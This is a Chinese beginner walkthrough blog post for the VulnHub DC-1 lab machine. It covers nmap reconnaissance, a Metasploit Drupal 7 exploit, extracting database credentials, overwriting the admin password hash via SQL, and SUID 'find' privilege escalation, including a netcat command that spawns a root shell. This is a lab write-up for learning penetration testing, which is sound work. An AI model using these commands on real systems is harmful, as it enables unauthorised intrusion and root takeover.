【Vulnhub】DC-1(新手入门)

最新推荐文章于 2023-06-12 10:40:22 发布
最新推荐文章于 2023-06-12 10:40:22 发布
阅读量74 收藏
点赞数
分类专栏: Vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangshuaiijie/article/details/131152657
版权

下载地址DC: 1 ~ VulnHub

DC系列一共九个靶机,每个靶机五个flag。

信息收集

先用nmap扫IP,端口
发现一个陌生的端口111,是rpcbind服务,当时第一反应就是去搜搜这个端口有什么洞能用,结果啥都没有
在这里插入图片描述
访问网站:是一个Drupal7网站
在这里插入图片描述

web

上MSF寻找exp,有七八个,从最新的开始试(时间越久漏洞越容易被修复);
用18年的那个exp
flag1.txt就在这下边。

在这里插入图片描述

Every good CMS needs a config file - and so do you.

数据库

flag1提示CMS的config文件,在/var/www/sites/default/settings.php
出现了flag2和数据库的用户名和密码

dbuser
R0ck3t

在这里插入图片描述
尝试登录数据库,
先打开一个交互式会话,普通会话mysql不会回显

shell 获取普通shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’ 获取交互式shell

在这里插入图片描述

找网站的数据库,需要admin的密码(我这个是修改过之后的,原来的没保留)
在这里插入图片描述
是加密的,没见过,搜了搜是Drupal7的加密
Drupal7的密码加密脚本文件为/scripts/password-hash.sh
自己设置一个密码
注意:只能在www目录下使用这个脚本,不知道为什么,不然会报错
在这里插入图片描述

然后进入MySQL数据库修改users表,将你自己加密的密码修改为admin的密码

update users set pass="$S$DSEkTHN8z7ETTiz/Yl21jwAlgu4tPFUSdLxPwym3fCH/EUwpkaN3" where uid=1

在这里插入图片描述
登录网站,找到flag3

Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.
关键字passwd和shadow

shadow没访问权限

在这里插入图片描述
passwd中有flag4
在这里插入图片描述

Can you use this same method to find or access the flag in root?
Probably. But perhaps it’s not that easy. Or maybe it is?

SUID之find提权

关键字find?find能suid提权,查找有没有suid权限

find / -user root -perm -4000 -print 2>/dev/null

有,那就提权,最后一个flag就在root目录下
在这里插入图片描述
find提权

cd /tmp;touch xxx    随便创建一个文件可以在tmp目录下
find xxx -exec whoami \;    
find xxx -exec /bin/sh \;    利用find得到一个root权限的shell
find xxx -exec nc -lvp 4444 -e /bin/sh \;利用nc反弹一个root权限的shell
前提是linux靶场有nc工具,并且攻击机开启了监听
    攻击机 靶场ip 4444

总结

这个靶场还是比较综合的,要对Drupal有一定的了解,不然网站都登不上去

逢星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub 入门DC-1
weixin_52780973的博客
12-31 332
vulnhub靶场 入门 DC-1 攻防
Vulnhub DC-3靶机思路分析
Sum
03-26 173
DC-3(入门) 关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-3: 下载地址: https : //download.vulnhub.com/dc/DC-3.zip 环境: Vmware 15 Pro虚拟机软件 DC-3靶机IP地址:192.168.233.140 Kali的IP地址:192.168.233.134 主机渗透系统: kali2020 安装好虚拟机后挂载Vmware运行 局域网内主机发现 扫描局域网所有设备(所有
Vulnhub DC-1靶机思路分析
Sum
03-21 222
DC-1(入门) 关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: kali2020 安装好虚拟机后挂载Vmware运行 局域网内主机发现 root@kali:~# arp-scan -l 通过扫描可以找出靶机地址192.168.233.135 -sV 用来扫描目标主机和端口上运行的软件的版本 发现开放80端口,
Vulnhub DC Challenges之 DC-1
ST0new的博客
05-24 921
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 网址:https://www.vulnhub.com DC 系列 DC总共有6个靶机,本次我...
Vulnhub DC-2靶机思路分析
Sum
03-22 1632
DC-2(入门) 关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-2: 下载地址: https://www.vulnhub.com 主机渗透系统: kali2020 安装好虚拟机后挂载Vmware运行 局域网内主机发现 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) root@kali:~# arp-scan -l 通过扫描可以找出靶机地址192.168.233.136 nmap -sS -Pn -A -p- -n
Vulnhub DC-4靶机思路分析
Sum
03-30 242
Vulnhub DC-3靶机思路分析 DC-4(入门) 关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-4下载地址: https : //download.vulnhub.com 环境: Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.233.141 Kali的IP地址:192.168.233.142 主机渗透系统: kali2021 安装好虚拟机后挂载Vmware运行 局域网内主机发现 扫描局域网所有
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
Vulnhub系列--DC:1
qq_33775686的博客
05-05 198
知识点 netdiscover nmap metaspaloit find 提权 1、信息收集 ​ 通过 netdiscover探测当前网络下主机地址,发现192.168.1.133 使用nmap对目标地址进行进一步探测,主要检查其端口、系统版本等,可以看到目标系统开放了22、80、111端口,发现80端口下运行的服务是Drupal服务 drupal是一个php开发的CMF系统,可以使用github或者msf查一下drupal是否存在可利用漏洞,可以看到,Drupal8是存在一个远程执行代码漏洞的,这
VulnhubDC-2(新手入门
zhangshuaiijie的博客
06-12 133
这靶机有点难,每个用户的权限都不一样,rbash绕过,git提权。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8328
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
最新发布
07-08
ROS安装配置与语法介绍文档、ROS代码文档、树莓派与ROS结合使用等相关文档
2003-2023年飞机航线信息数据.xlsx
07-08
2003-2023年飞机航线信息数据 1、时间:2003-2023年 2、来源:高铁航线数据库(Chinese High-speed Rail and Airline Database,CRAD) 3、指标:起点城市、起点城市所属地级市、起点城市所属省份、起点机场、终点城市、终点城市所属地级市、终点城市所属省份、终点机场、航空公司、更新日期、航班、出发时间、到达时间、准点率、班次_周一、班次_周二、班次_周三、班次_周四、班次_周五、班次_周六、班次_周日
Xilinx Vitis 2020工程源目录修改
07-08
Xilinx Vitis可以做standalone程序开发,不过其工程中使用的路径为绝对路径。工程更换位置后编译将会显示错误。例如:源目录为D:/work,复制到同事电脑上放到C:/work(同事电脑只有一个C盘)。利用Vitis打开工程编译会有一堆错误,提示文件找不到。本脚本用来解决该问题。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值